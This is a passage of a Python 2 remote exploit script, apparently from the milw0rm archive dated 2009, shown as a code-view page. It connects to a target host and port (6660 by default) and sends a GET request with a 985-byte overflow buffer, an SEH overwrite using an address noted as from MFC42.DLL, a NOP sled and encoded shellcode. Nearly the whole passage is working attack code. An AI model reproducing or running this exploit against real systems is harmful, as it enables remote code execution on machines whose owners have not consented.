||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
|
||||
shellcode = (
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
|
||||
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
|
||||
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
|
||||
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
|
||||
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
|
||||
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
|
||||
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
|
||||
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
|
||||
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
|
||||
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
|
||||
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
|
||||
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
|
||||
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
|
||||
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
|
||||
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
|
||||
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
|
||||
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
|
||||
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
|
||||
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
|
||||
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985
|
||||
next_seh = "\xeb\x06\x90\x90"
|
||||
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
|
||||
nops = "\x90" * 10
|
||||
sec = shellcode
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
|
||||
s.close()
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
|
|
Loading…
Add table
Reference in a new issue